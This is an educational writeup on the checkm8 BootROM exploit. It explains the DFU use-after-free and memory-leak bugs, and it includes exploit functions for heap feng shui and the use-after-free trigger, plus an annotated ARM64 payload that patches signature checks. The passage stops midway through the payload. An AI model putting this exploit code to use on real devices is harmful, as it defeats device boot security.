Deep Dive

What We’re Looking At

This writeup walks through my journey learning about checkm8, one of the biggest BootROM exploits ever found. My goal was simple: understand how this exploit works well enough to build my own version from scratch.

The checkm8 exploit uses two different bugs together:

  • A use after free bug (stayed in the code until the A14 chip)
  • A memory leak bug (Apple fixed this starting with A12)

Here’s the important part: you need both bugs working together for the exploit to work. The memory leak isn’t just helpful; without it, the use after free can’t be exploited at all. This is why A12 and A13 devices can’t be exploited by checkm8 even though they still have the use after free bug. Apple fixed the memory leak, which blocked the whole attack.

Helpful Resources

Before we start, check out these resources that helped me learn:

Quick Note

For legal reasons, all code examples in this writeup come from pseudocode that shows how things work. You can also find these same functions in leaked iBoot/BootROM source code. I’ve cleaned up these examples by removing extra code and renaming variables to make them easier to read. The removed code includes checks and safety features that don’t matter for understanding the bugs. Function names stay the same as in the original code though.

Setting Things Up: USB Starts

The USB system starts through usb_init(), which then calls usb_dfu_init(). This setup does several important things: it creates a DFU interface to handle USB communications and sets up a global input/output buffer for data transfers.

int usb_dfu_init()
{
  // Create and clear the global IO buffer
  // 0x800 byte buffer aligned to 0x40 bytes
  // (size first, then alignment, the reverse of libc's memalign())
  io_buffer = memalign(0x800, 0x40);
  bzero(io_buffer, 0x800);

  // Set up global state variables
  completionStatus = -1;
  totalReceived = 0;
  dfuDone = false;

  // Create the USB interface
  // ... //

  return 0;
}

What to remember from this:

  • The global IO buffer gets created to hold incoming USB data
  • bzero() fills this whole buffer with zeros for a clean start
  • State tracking variables are set to starting values
  • A global USB interface is set up and ready

How USB Transfers Work

When Requests Come In

When DFU gets a USB control transfer, the system calls usb_core_handle_usb_control_receive(). This function looks up the registered DFU interface and passes the request to its handler, handle_interface_request(). Let’s look at what happens when the host sends data to the device:

For download operations (which are really important for understanding this bug), the function gives back one of three possible results:

  • 0 means transfer finished successfully
  • -1 means the requested wLength is bigger than the IO buffer can hold
  • wLength value means device is ready to receive exactly wLength bytes

int handle_interface_request(struct usb_device_request *request, uint8_t **out_buffer)
{
  int ret = -1;

  // Check if this is a host to device transfer
  if ((request->bmRequestType & 0x80) == 0)
  {
    switch(request->bRequest)
    {
      case 1: // DFU_DNLOAD
      {
        // Reject transfers bigger than the 0x800 byte IO buffer
        if(request->wLength > 0x800) {
          return -1;
        }

        *out_buffer = (uint8_t *)io_buffer; // Point to IO buffer
        expecting = request->wLength;
        ret = request->wLength;
        break;
      }

      case 4: // DFU_CLR_STATUS
      case 6: // DFU_ABORT
      {
        totalReceived = 0;

        if(!dfuDone) {
          // Update globals to stop DFU
          completionStatus = -1;
          dfuDone = true;
        }

        ret = 0;
        break;
      }
    }
    return ret;
  }
  return -1;
}

Pay attention to these important details:

  • The out_buffer parameter gets updated to point to the global IO buffer
  • The function returns wLength (after checking it) to show expected data length

Back in usb_core_handle_usb_control_receive(), this return value decides what to do next:

int ret = registeredInterfaces[interfaceNumber]->handleRequest(&setupRequest, &ep0DataPhaseBuffer);

// Host to device transfer
if((setupRequest.bmRequestType & 0x80) == 0) {

  // Handler returned wLength, get ready for data
  if (ret > 0) {
    ep0DataPhaseLength = ret;
    ep0DataPhaseInterfaceNumber = interfaceNumber;
    // Begin data phase
  }

  // Handler returned 0, transfer complete
  else if (ret == 0) {
    usb_core_send_zlp();
    // Begin data phase
  }
}

// Device to host transfer
else if((setupRequest.bmRequestType & 0x80) == 0x80) {
    // Begin data phase
}

When handle_interface_request() returns a positive value, the core stores it in ep0DataPhaseLength, the global variable tracking how many bytes the data phase should receive. Notice that ep0DataPhaseBuffer now points to the global IO buffer, ready for the data phase.

Moving Data

After the setup phase finishes, the data phase begins. Here’s the important part of handle_ep0_data_phase() that handles incoming data:

void handle_ep0_data_phase(u_int8_t *rxBuffer, u_int32_t dataReceived, bool *dataPhase)
{
  // Copy received data to data phase buffer
  // ...

  // Check if we got everything
  if(ep0DataPhaseReceived == ep0DataPhaseLength)
  { 
    // Call interface callback and send zero length packet
    // to show we're done

    goto done; // Clean up global state
  }
  return;
}

Once all data arrives, the IO buffer contents get copied to an image buffer for loading later. Then this cleanup code runs:

done:
  ep0DataPhaseReceived = 0;
  ep0DataPhaseLength = 0; 
  ep0DataPhaseBuffer = NULL;
  ep0DataPhaseInterfaceNumber = -2;

Let me sum up this whole process:

  • During DFU setup, the IO buffer is created and cleared
  • For data transfers, the global buffer pointer is set to the IO buffer
  • USB data goes directly into the IO buffer
  • After image transfer finishes, IO buffer contents move to an image buffer
  • Global state gets reset, getting ready for the next image transfer

The Main Bug: Use After Free

How Images Move Through The System

When DFU mode starts, the main entry point is getDFUImage(). Here are its basic operations:

int getDFUImage(void* buffer, int maxLength)
{
  // Store parameters in globals
  imageBuffer = buffer;
  imageBufferSize = maxLength;

  // Wait for DFU to finish
  while (!dfuDone) {
    event_wait(&dfuEvent);
  }

  // Shut down USB operations
  usb_quiesce();

   // return ... //
}

The function basically waits for DFU operations to finish, then shuts down the USB stack. Looking back at handle_ep0_data_phase(), we see global variables get reset after the data phase completes. But what if the data transfer never finishes? The function just returns without clearing global state. This is great for an attacker because the global variable pointing to the IO buffer keeps its value.

What Happens When Things Shut Down

Looking at handle_interface_request() again shows that sending a DFU_ABORT command sets dfuDone to true, stopping DFU. A USB reset does the same thing through handle_bus_reset(). In getDFUImage(), this triggers usb_quiesce() to tear down the USB stack:

void usb_quiesce()
{
  usb_core_stop();
  usb_free();
  usb_inited = false;
}

The usb_free() function calls usb_dfu_exit(), which has this important code:

if (io_buffer) {
  free(io_buffer);
  io_buffer = NULL;
}

Following what happens, we find:

  • An incomplete data phase means the data phase globals are never reset
  • A DFU_ABORT command sets dfuDone to true
  • This triggers usb_quiesce(), which frees the IO buffer
  • getDFUImage() returns and gets called again when DFU restarts
  • The data phase globals don’t get reset on restart either
  • The global variable that pointed to the IO buffer keeps its value, but now points to freed memory
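The sequence above can be modelled with a small host-side toy in C. This is only a sketch: the struct and function names (dfu_model, model_dnload_setup and so on) are made up for illustration, and the IO buffer is represented by an integer ID instead of real heap memory, so the model itself never touches freed memory.

```c
#include <stdbool.h>

/* Toy model of the DFU globals. Every name here is hypothetical. */
struct dfu_model {
    int  io_buffer_id;      /* models io_buffer (0 = not allocated)     */
    int  data_phase_buf_id; /* models ep0DataPhaseBuffer (0 = NULL)     */
    int  next_id;           /* source of fresh fake allocation IDs      */
    bool dfu_done;
};

/* Models usb_dfu_init(): a new IO buffer is allocated on every start.
 * The data phase pointer is deliberately NOT reset, mirroring the bug. */
void model_dfu_init(struct dfu_model *m) {
    m->io_buffer_id = ++m->next_id;
    m->dfu_done = false;
}

/* Models the DFU_DNLOAD setup packet: point the data phase at the IO buffer. */
void model_dnload_setup(struct dfu_model *m) {
    m->data_phase_buf_id = m->io_buffer_id;
}

/* Models the cleanup that only runs when the data phase completes. */
void model_data_phase_complete(struct dfu_model *m) {
    m->data_phase_buf_id = 0;
}

/* Models DFU_ABORT followed by usb_quiesce(): the IO buffer is freed. */
void model_abort(struct dfu_model *m) {
    m->dfu_done = true;
    m->io_buffer_id = 0;
}

/* True when the data phase pointer refers to a buffer that no longer exists. */
bool model_pointer_is_dangling(const struct dfu_model *m) {
    return m->data_phase_buf_id != 0
        && m->data_phase_buf_id != m->io_buffer_id;
}
```

Running init, setup, abort, init in that order leaves model_pointer_is_dangling() true, while inserting model_data_phase_complete() before the abort leaves it false.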

This is our use after free bug, the exact bug used by checkm8. Next, I’ll explain how to use this bug to run code. But first, we need a memory leak.

If you’re paying close attention, you might notice that sending another DFU_DNLOAD request after triggering the use after free would just reset the global variables. We work around this by not sending any requests that would do that between triggering the bug and sending our overwrite. Once our overwrite is at the start of the freed buffer, we can send the payload (using DFU_DNLOAD) to the new IO buffer, and the overwrite will send execution to our payload. I’ll explain this better later.

The Other Bug We Need: Memory Leak

Why We Need This

The SecureROM is really predictable. The IO buffer usually gets created at roughly the same heap location each time the USB stack starts. But exploiting the use after free needs DFU to restart and call getDFUImage() again, creating a problem: the newly created IO buffer would normally be allocated right where the freed buffer was, so the stale pointer would point at a valid buffer again, making our bug useless.

This is where the memory leak comes in. It’s our way to trick the heap allocator into putting the new IO buffer somewhere else on the heap. This leak being missing on A12 and A13 is why checkm8 doesn’t work on those devices. They have the use after free bug and it can be triggered, but there’s no way to stop the IO buffer from being put over the freed one.

For context: a memory leak happens when memory gets allocated but doesn’t get properly freed, leaving memory allocated but impossible to access.

Looking At USB Request Structures

Here’s the usb_device_io_request structure (I’ll call it io_request to keep it simple):

struct usb_device_io_request
{
    u_int32_t                       endpoint;
    volatile u_int8_t               *io_buffer;
    int                             status;
    u_int32_t                       io_length;
    u_int32_t                       return_count;
    void (*callback) (struct usb_device_io_request *io_request);
    struct usb_device_io_request    *next;
};

Two fields matter for understanding the memory leak: callback points to a function that gets called when the request finishes, and next points to the next io_request in the linked list.
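To see where those two fields sit, the layout can be checked with offsetof. This sketch re-declares the structure under a hypothetical name (io_request_layout) with <stdint.h> types, and it assumes a 64-bit target with 8 byte pointers and natural alignment, like the ARM64 SoCs discussed here. On other ABIs the numbers will differ.

```c
#include <stddef.h>
#include <stdint.h>

/* Same field order as usb_device_io_request; the name is hypothetical. */
struct io_request_layout {
    uint32_t                  endpoint;
    volatile uint8_t         *io_buffer;
    int                       status;
    uint32_t                  io_length;
    uint32_t                  return_count;
    void                    (*callback)(struct io_request_layout *io_request);
    struct io_request_layout *next;
};

/* Offset of the callback pointer inside the structure. */
size_t callback_offset(void) {
    return offsetof(struct io_request_layout, callback);
}

/* Offset of the next pointer inside the structure. */
size_t next_offset(void) {
    return offsetof(struct io_request_layout, next);
}

/* Total size of one request object, before any heap rounding. */
size_t request_size(void) {
    return sizeof(struct io_request_layout);
}
```

Under those assumptions callback sits at offset 0x20 and next at 0x28, for a total of 0x30 bytes.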

Where The Bug Lives

Stalling the device to host pipe stops it from processing requests while stalled. During this stalled time, you can trigger lots of allocations by sending many requests. Each request gets its io_request structure created and added to the endpoint’s linked list. When you unstall the pipe, all these requests get freed. This gives us the ability to allocate objects and delay when they get freed on the heap.

But these allocations won’t stay around through USB stack shutdown. For that, we need a memory leak where certain requests never get properly freed.

The leak exists in the standard callback for io_request objects. The device tries to send a zero length packet if, and only if, three things are true: the request length is more than zero, it is an exact multiple of the packet size (0x40), and the host requested more bytes than this length.

void standard_device_request_cb (struct usb_device_io_request *request)
{
  if ((request->io_length > 0)
  && ((request->io_length % 0x40) == 0)
  && (setup_request.wLength > request->io_length)) { 
    usb_core_send_zlp();
  }
}

When a USB reset or DFU abort triggers USB stack shutdown, the device first stops all endpoints, then runs bzero() on the whole endpoint structure array. While the endpoints are being stopped, all waiting requests are completed as failed, which triggers their callbacks. The problem: any zero length packet a callback queues at this point never gets sent, and once bzero() wipes the endpoint array nothing points to it anymore, so it is never freed. It leaks.

Stalling the pipe and sending lots of requests creates a buildup of allocations. Triggering a USB reset runs these request callbacks, which queue extra zero length packets that leak.

On A12+ devices, the abort that follows a USB reset also aborts EP0_IN for each setup packet, so abort() gets called twice. The first abort queues an extra zero length packet, but the second cleans it up. Only after this does bzero() happen, so nothing leaks.

There’s a second bug that helps the leak. Inside standard_device_request_cb(), the current setup packet’s wLength is checked against the request’s io_length. But the function doesn’t account for the setup packet having been overwritten by a newer one by the time the check happens. During the heap spray we queue lots of requests, then send a final request with the biggest wLength of all. When the USB stack shuts down, every callback compares its own io_length against that final wLength.

When the host receives a packet smaller than 0x40 bytes (since transfers split into 0x40 byte chunks), the transfer is done. So for transfer lengths that are exact multiples of 0x40, a zero length packet must signal that the transfer ended.
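The three conditions from standard_device_request_cb() can be pulled out into a small predicate to experiment with. This is a minimal sketch: needs_zlp is a hypothetical name, and latest_wLength stands for the wLength of whichever setup packet arrived most recently, which (as described above) is not necessarily the one that created the request.

```c
#include <stdbool.h>
#include <stdint.h>

#define EP0_MAX_PACKET_SIZE 0x40u

/* Mirrors the check in standard_device_request_cb():
 * a zero length packet is queued only when the response is non-empty,
 * ends exactly on a packet boundary, and the host asked for more. */
bool needs_zlp(uint32_t io_length, uint16_t latest_wLength) {
    return io_length > 0
        && (io_length % EP0_MAX_PACKET_SIZE) == 0
        && latest_wLength > io_length;
}
```

For example, a 0x40 byte response qualifies once the latest setup packet carries a wLength of 0xC1, while a 0xC1 byte response never does, because its final packet is already shorter than 0x40 bytes.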

The callbacks run during USB stack shutdown can therefore queue zero length packet requests that then leak. These are perfect for shaping the heap. Because of how the heap allocator works, if the IO buffer is 0x800 bytes and two allocations are leaked exactly 0x800 bytes apart, the space between them becomes the preferred spot for the next 0x800 byte allocation (the IO buffer when DFU restarts). The heap allocator picks the smallest free space that fits the request, and the space between the leaked allocations is exactly the right size.
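The "smallest space that fits" behaviour is easy to picture with a toy best-fit search. This is a deliberately simplified model, not the SecureROM allocator: the function name best_fit and the flat array of free chunk sizes are assumptions made for illustration, and real heap metadata and bins are ignored.

```c
#include <stddef.h>

/* Returns the index of the smallest free chunk that can hold `want`
 * bytes, or -1 if no chunk is large enough. */
int best_fit(const size_t *free_sizes, int count, size_t want) {
    int best = -1;
    for (int i = 0; i < count; i++) {
        if (free_sizes[i] < want) {
            continue; /* too small, cannot be used */
        }
        if (best < 0 || free_sizes[i] < free_sizes[best]) {
            best = i; /* tighter fit than anything seen so far */
        }
    }
    return best;
}
```

With free chunks of 0x2000, 0x800 and 0x1000 bytes, a 0x800 byte request picks the 0x800 chunk even though larger ones come first in the list, which is why a hole of exactly the IO buffer's size attracts the next IO buffer.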

Making It Work

To trigger the use after free with an incomplete data phase, you have to go beyond normal USB transfer rules defined in the USB spec. The open source community has used two approaches: first, using microcontrollers (Arduino + USB Host Controller) for maximum control over the host USB stack, letting you control exactly what gets sent and when; second, forcing transfer cancellation midway through, as done in ipwndfu and gaster (among others) using really short timeouts on async transfers.

Exploitation happens in three stages:

  1. Setting up the heap (heap feng shui)
  2. Triggering the use after free bug
  3. Sending and running the payload

The next sections have code examples from my Achilles project, heavily based on gaster’s implementation. Note that this is simplified for the T8011 SoC. Certain exploit parts are different across different SoCs.

Setting Up The Heap

Heap feng shui means purposely changing the heap layout to help exploitation. Using the memory leak we talked about earlier, we can trick the heap allocator into putting the IO buffer at a different location when restarting, letting us access the freed buffer from the previous DFU run.

To create the hole for the next IO buffer, we should:

  1. Stall the device to host endpoint
  2. Send lots of requests to create a buildup of allocations
  3. Have the first and last requests meet requirements for sending an extra zero length packet
  4. Trigger a USB reset so usb_quiesce() is called and these requests leak
  5. Leave ourselves with a hole controlling next IO buffer allocation

Since all heap allocations round up to the nearest 0x40 multiple, and each packet has a 0x40 byte header, we can safely assume each io_request object takes 0x80 bytes on the heap. One strategy would be sending 0x10 non leaking packets to create an 0x800 byte hole, exactly the IO buffer size. Testing proved this worked, but it’s not what we chose.
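The arithmetic behind those numbers can be written out as a short sketch. The helper names (heap_footprint, hole_size) are hypothetical, and the 0x30 byte object size used in the note below is an assumption based on the structure layout on a 64-bit target; the 0x40 rounding and 0x40 header come from the description above.

```c
#include <stddef.h>

#define HEAP_ALIGN  0x40u /* allocations round up to a multiple of this */
#define HEAP_HEADER 0x40u /* per-allocation header size                 */

/* Bytes an allocation of `request` bytes occupies on the heap. */
size_t heap_footprint(size_t request) {
    size_t rounded = (request + HEAP_ALIGN - 1) / HEAP_ALIGN * HEAP_ALIGN;
    return rounded + HEAP_HEADER;
}

/* Size of the hole left behind when `count` such objects are freed. */
size_t hole_size(size_t object_size, size_t count) {
    return heap_footprint(object_size) * count;
}
```

A 0x30 byte object rounds up to 0x40 and gains a 0x40 byte header, giving 0x80 bytes, and 0x10 of them add up to 0x800 bytes, the size of the IO buffer.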

A faster, simpler strategy (used in most implementations) sends the bare minimum packets such that a hole is created smaller than 0x800, but big enough that allocations shuffle around enough for the IO buffer to be allocated somewhere else when restarting. This is the strategy in the function below, adapted for T8011 BootROM:

bool checkm8HeapSpray(device_t *device)
{
    checkm8Stall(device);
    for (int i = 1; i <= config.hole; i++)
    {
        checkm8NoLeak(device);
    }
    checkm8USBRequestLeak(device);
    checkm8NoLeak(device);
    return true;
}

Walking through step by step:

checkm8Stall(device);

This stalls the device to host endpoint, letting lots of io_request structures be created as requests pile up unprocessed during the stalled state. Also, this request leaks a zero length packet, matching the callback function’s requirements for sending an extra zero length packet.

for (int i = 1; i <= config.hole; i++)
{
    checkm8NoLeak(device);
}

This sends config.hole requests to the device, each getting an io_request structure created. These requests won’t leak zero length packets since they don’t meet the callback function’s requirements. This creates a ‘hole’ that will be properly freed when the USB stack stops.

checkm8USBRequestLeak(device);

This leaks an extra zero length packet, giving us our needed hole. Since the stall request at the function’s start also leaked a zero length packet, current allocations look like this:

[  Leaked packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Leaked packet  ]

After USB stack reset, it becomes:

[ Allocated space ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[ Allocated space ]

The heap allocator then places enough later allocations inside this hole to shuffle the others around, so the IO buffer gets allocated somewhere else when DFU restarts.

checkm8NoLeak(device);

This sends a request that doesn’t leak a zero length packet and gets freed when the USB stack stops. The checkm8NoLeak() transfer has a wLength of 0xC1, the highest of all heap feng shui transfers. Because it is the last setup packet sent, its wLength is the one the callbacks compare against during shutdown, so the earlier requests satisfy the “host requested more bytes” condition and their extra zero length packets get queued and leaked.

At this point, the heap is shaped so the next IO buffer gets put at a different location than the standard address, which is taken by the freed buffer. If the new IO buffer got put in the same place, we couldn’t exploit the use after free since the freed buffer would be overwritten.

Triggering The Bug

With the new IO buffer hopefully put somewhere else on the heap (thanks to our heap feng shui), we can now trigger the main use after free bug.

  1. Send a setup packet with request type where bmRequestType & 0x80 == 0 (we’ll use 0x21), a DFU_DNLOAD request, and a wLength less than or equal to 0x800. This sets all global variables to needed values.
  2. Begin the data phase but leave it incomplete to avoid clearing global state.
  3. Send a DFU_ABORT request (or DFU_CLRSTATUS, which shares the same handler case) to free the IO buffer and trigger DFU restart. This activates the use after free.

Here’s my function triggering the use after free:

bool checkm8TriggerUaF(device_t *device)
{
  unsigned usbAbortTimeout = 10;
  transfer_ret_t transferRet;

  while(sendUSBControlRequestAsyncNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, 0x800, usbAbortTimeout, &transferRet)) {
    if(transferRet.sz < config.overwritePadding 
    && sendUSBControlRequestNoData(&device->handle, 0, 0, 0, 0, config.overwritePadding - transferRet.sz, &transferRet) 
    && transferRet.ret == USB_TRANSFER_STALL) {
      sendUSBControlRequestNoData(&device->handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL);
      return true;
    }
    if(!sendUSBControlRequestNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SIZE, NULL)) {
      break;
    }
    usbAbortTimeout = (usbAbortTimeout + 1) % 10;
  }
  return false;
}

First, let’s look at the while loop:

while(sendUSBControlRequestAsyncNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, 0x800, usbAbortTimeout, &transferRet)) {
  // ... //
  usbAbortTimeout = (usbAbortTimeout + 1) % 10;
}

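We’re sending the packet needed to set the global variables, but asynchronously and with a very short timeout so that it can be cancelled midway through. The timeout changes on every retry: it starts at 10 and, because of the (usbAbortTimeout + 1) % 10 update, then cycles through 1, 2, ..., 9, 0 and around again until one attempt is cancelled at the right moment. This leaves the device with a partially complete data phase.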
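The timeout update from the loop can be isolated to see which values it actually produces. This is a small sketch with hypothetical helper names (next_abort_timeout, fill_abort_timeouts); the starting value of 10 and the modulus are taken from checkm8TriggerUaF() above.

```c
#include <stddef.h>

/* Same update as in checkm8TriggerUaF(). */
unsigned next_abort_timeout(unsigned current) {
    return (current + 1) % 10;
}

/* Fills `out` with the first `count` timeouts used, starting from `start`. */
void fill_abort_timeouts(unsigned *out, size_t count, unsigned start) {
    unsigned timeout = start;
    for (size_t i = 0; i < count; i++) {
        out[i] = timeout;
        timeout = next_abort_timeout(timeout);
    }
}
```

Starting from 10, the values are 10, 1, 2 and so on up to 9, then 0, then 1 again, so the loop sweeps a small range of timeouts repeatedly.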

Interestingly, we never actually send data to trigger this use after free. Sending the 0x21, DFU_DNLOAD request sets global variables and sets the global data phase variable to true.

if(transferRet.sz < config.overwritePadding 
    && sendUSBControlRequestNoData(&device->handle, 0, 0, 0, 0, config.overwritePadding - transferRet.sz, &transferRet) 
    && transferRet.ret == USB_TRANSFER_STALL) {
    sendUSBControlRequestNoData(&device->handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL);
    return true;
}

After sending the async request, we check if the device returned a size less than the overwrite padding. The overwrite padding makes sure our later overwrite goes to the right memory location. I won’t go too deep into this.

We then check if the device is stalled, which shows conditions are right for triggering the use after free. If so, send a DFU_CLRSTATUS to shut down the USB stack and trigger the bug.

After this, the first run’s IO buffer is freed while global variables keep their values, including the variable pointing to the old IO buffer. Thanks to the heap feng shui, the new IO buffer should be allocated at a different address. So sending data to the device writes it to the address in the global variable, which still points to the old, freed IO buffer.

Next, we need to send our overwrite and payload to get full code execution.

Building Our Payload

The complete payload is the data we send to get full device execution as part of exploitation. It comes in two parts:

  1. The overwrite
  2. The actual payload

The overwrite is data sent to overwrite the callback and next fields of an io_request structure. This redirects execution to the main payload.

The main payload is machine code doing things like changing the USB serial number and patching signature checks to let unsigned images boot. I’m using the gaster payload, which is used both in that project and in my own.

Part One: The Overwrite

For the overwrite, the callback and next fields in the io_request structure at the freed buffer’s start need overwriting. Both are pointers to memory areas. callback points to the callback function and next points to the next io_request in the waiting requests linked list.

When exploiting checkm8, overwriting the callback function lets us restore the link and FP registers, stopping the current USB request from being freed. Since we’ve overwritten heap data, trying to free the object would cause invalid heap metadata, causing issues and maybe device crashes.

For those who don’t know: the link register (LR) holds the address to jump back to after returning from a function. The frame pointer (FP) holds the current stack frame’s address, which looks like this:

Top of Stack
|  Return Address |
|  Arguments      |
| Local Variables |
| Saved Registers |
|  Frame Pointer  |
Bottom of Stack

The stack frame is the stack area currently used by the program, usually changing when functions are called or return. It holds local variables, return address, and other important program data.

But why restore these registers? Remember that when the USB stack shuts down, it processes waiting requests and usb_core_complete_endpoint_io() runs each callback function. But after doing this, this function frees the IO request object. By restoring the link and FP registers, we can have execution jump back to the function that called usb_core_complete_endpoint_io(), instead of continuing to free the IO request object.

Since callback is a pointer to a memory area, we can’t just overwrite the field with machine code to do this job. This brings us to the nop gadget used in popular checkm8 implementations, though the name isn’t really accurate. nop means “no operation,” usually code doing nothing. But in checkm8’s case, the nop gadget in BootROM code looks like this:

ldp x29, x30, [sp, #0x10]
ldp x20, x19, [sp], #0x20
ret

For context, the x29 register is the frame pointer, and x30 is the link register. It’s important to know that for ARM64, the stack usually grows downward from high to low addresses, and the stack pointer (SP) holds the lowest address taken by the stack.

Here’s what ldp x29, x30, [sp, #0x10] does:

  • ldp is the load pair instruction, loading a pair of registers from memory
  • x29, x30 is the register pair to load
  • [sp, #0x10] is the address to load registers from. sp is the stack pointer, and #0x10 is the offset. Since the stack grows downward, adding 0x10 to the stack pointer points to memory just above the stack pointer, where the saved FP and link register values are stored. The offset is 0x10 because the 16 bytes at [sp] itself hold another saved register pair (x20 and x19, loaded by the next instruction), and each register is 64 bits or 8 bytes.

ldp x20, x19, [sp], #0x20 does a similar job, except it loads the registers from the stack pointer without an offset, then adds 0x20 (32 bytes) to the stack pointer. This post-indexed form pops the whole 0x20 byte frame (both register pairs) in one go, leaving the stack pointer where the caller expects it.

Finally, ret is the return instruction, returning to the address stored in the link register.
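The effect of the three instructions can be mimicked in C to make the register and stack pointer changes concrete. This is a sketch of the gadget's semantics only: the regs struct and run_nop_gadget are hypothetical names, the stack is modelled as an array of 8 byte words, and the final ret is represented by simply leaving the target address in x30.

```c
#include <stdint.h>

/* Just the registers the gadget touches. */
struct regs {
    uint64_t x19, x20, x29, x30, sp;
};

/* `stack` holds the stack contents as 64-bit words and `stack_base`
 * is the address that stack[0] represents. */
void run_nop_gadget(struct regs *r, const uint64_t *stack, uint64_t stack_base) {
    const uint64_t *frame = stack + (r->sp - stack_base) / 8;

    /* ldp x29, x30, [sp, #0x10] */
    r->x29 = frame[2];
    r->x30 = frame[3];

    /* ldp x20, x19, [sp], #0x20 (load, then post-increment sp) */
    r->x20 = frame[0];
    r->x19 = frame[1];
    r->sp += 0x20;

    /* ret: execution would continue at the address now in r->x30 */
}
```

After the call, all four registers hold the values saved in the frame and sp has moved up by 0x20, which is exactly what a normal function epilogue would do.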

Running Our Code

With the payload in place and an io_request having its next field pointing to an address inside our payload, we can trigger a USB reset. As always, this processes the list of waiting requests (which we just created while stalled) as failed and runs the callback for each.

When it reaches our overwritten io_request object, it runs the callback (just the nop gadget, which restores the link and FP registers) then follows the next field, which points into the middle of our payload. It then tries to run the callback field of what it thinks is another io_request object. In reality it starts running our callback chain, reading the function pointer from the address we wrote into the next field plus the offset of the callback field in the io_request structure (0x20).

Now I’ll walk through the payload explaining exactly what it does at each step.

What The Payload Does

While ARM64 assembly may seem scary, it makes sense once you understand each instruction. Here’s the _main function from the main checkm8 payload for T8011, containing another label as part of it:

_main:
  stp x29, x30, [sp, #-0x10]!
  ldr x0, =payload_dest
  ldr x2, =dfu_handle_bus_reset
  str xzr, [x2]
  ldr x2, =dfu_handle_request
  add x1, x0, #0xC
  str x1, [x2]
  adr x1, _main
  ldr x2, =payload_off
  add x1, x1, x2
  ldr x2, =payload_sz
  ldr x3, =memcpy_addr
  blr x3
  ldr x0, =gUSBSerialNumber
_find_zero_loop:
  add x0, x0, #1
  ldrb w1, [x0]
  cbnz w1, _find_zero_loop
  adr x1, PWND_STR
  ldp x2, x3, [x1]
  stp x2, x3, [x0]
  ldr x0, =gUSBSerialNumber
  ldr x1, =usb_create_string_descriptor
  blr x1
  ldr x1, =usb_serial_number_string_descriptor
  strb w0, [x1]
  mov w0, #0xD2800000
  ldr x1, =patch_addr
  str w0, [x1]
  ldp x29, x30, [sp], #0x10
  ret

PWND_STR:
.asciz " PWND:[checkm8]"

The first line pushes the frame pointer and link register onto the stack, as any function prologue would. After this line, the real payload begins.

ldr x0, =payload_dest
ldr x2, =dfu_handle_bus_reset
str xzr, [x2]

This loads the payload destination address into x0, and the dfu_handle_bus_reset address into x2. dfu_handle_bus_reset is the handle_bus_reset property of the USB interface created when DFU starts, just a pointer to the handle_bus_reset() function. The value in the xzr register (the zero register) is stored to memory at the dfu_handle_bus_reset address to make sure the device doesn’t respond to USB reset and trigger USB stack shutdown again. This would cause issues because of heap state and how we’re using allocated io_request structures for the exploit.

ldr x2, =dfu_handle_request
add x1, x0, #0xC
str x1, [x2]

This loads the dfu_handle_request address (the handle_request field of the interface) into x2, then adds 0xC to the value in x0 (the payload destination) and stores the result in x1. It then stores the value in x1 to the address in x2, which is dfu_handle_request. This means when interface->handle_request() is called, it jumps to shellcode inside payload_handle_checkm8_request.S, which is gaster specific and doesn’t need detailed coverage here. TL;DR: it replaces the DFU interface’s handle_request() function with a custom one doing something different when a specific USB request is sent (0xA1, 2). Gaster uses this in the gaster_command() function for encryption/decryption operations. If this specific request isn’t used, the replacement shellcode just calls the standard handle_interface_request() function.

adr x1, _main
ldr x2, =payload_off
add x1, x1, x2
ldr x2, =payload_sz
ldr x3, =memcpy_addr
blr x3

This loads the address of _main (computed relative to the program counter) into x1, and the payload offset payload_off into x2. Adding them together and storing the result in x1 gives the address that is payload_off bytes past _main. The payload_sz value is then loaded into x2 and the memcpy() function address into x3. Finally, blr x3 branches to the address in x3, setting the link register so that memcpy() returns to the next instruction in _main.

The memcpy() parameters are: memcpy(void *dst, void *src, size_t n). So the payload destination address is stored in x0, the payload address in x1, and payload size in x2. So the memcpy() call copies the payload to the payload destination.

ldr x0, =gUSBSerialNumber

After returning from memcpy(), the gUSBSerialNumber (global USB serial number) address is loaded into x0 as the payload destination is no longer needed.

_find_zero_loop:
  add x0, x0, #1
  ldrb w1, [x0]
  cbnz w1, _find_zero_loop

This loop adds 1 to the address in x0 (gUSBSerialNumber) and loads the byte at that address into w1. If the byte isn’t zero, it branches back to _find_zero_loop and continues. This continues until the byte at the address in x0 is zero, then continues to the next instruction. It finds the serial number string’s end in memory to add PWND:[checkm8] to it.

adr x1, PWND_STR
ldp x2, x3, [x1]
stp x2, x3, [x0]

The address of PWND_STR is loaded into x1, then the register pair x2 and x3 is loaded with the 16 bytes at that address: the 15 characters of “ PWND:[checkm8]” plus the terminating zero. These are stored to the address in x0, the serial number string’s end. This appends PWND:[checkm8] to the serial number string.
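In C, the loop and the 16 byte copy look roughly like the sketch below. The function name append_pwnd is hypothetical, and the caller is assumed to pass a non-empty, zero-terminated string with at least 16 spare bytes after it. Like the assembly, the loop advances before it checks, so the first byte is never tested.

```c
#include <string.h>

#define PWND_STR " PWND:[checkm8]"

/* 15 characters plus the terminator: one ldp/stp register pair. */
_Static_assert(sizeof(PWND_STR) == 16, "PWND_STR must be 16 bytes");

void append_pwnd(char *serial) {
    char *end = serial;

    /* _find_zero_loop: add x0, x0, #1 / ldrb w1, [x0] / cbnz w1, ... */
    do {
        end++;
    } while (*end != '\0');

    /* ldp x2, x3, [x1] / stp x2, x3, [x0]: copy 16 bytes, terminator included */
    memcpy(end, PWND_STR, sizeof(PWND_STR));
}
```

Calling it on a buffer holding a made-up serial such as "CPID:8011" leaves "CPID:8011 PWND:[checkm8]" in the buffer.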

ldr x0, =gUSBSerialNumber
ldr x1, =usb_create_string_descriptor
blr x1

The gUSBSerialNumber start address is loaded into x0 again, and the usb_create_string_descriptor() function address into x1. By branching with a link to register x1, the device creates a new string descriptor using the serial number so it appears to the host computer with the custom serial number string.

ldr x1, =usb_serial_number_string_descriptor
strb w0, [x1]

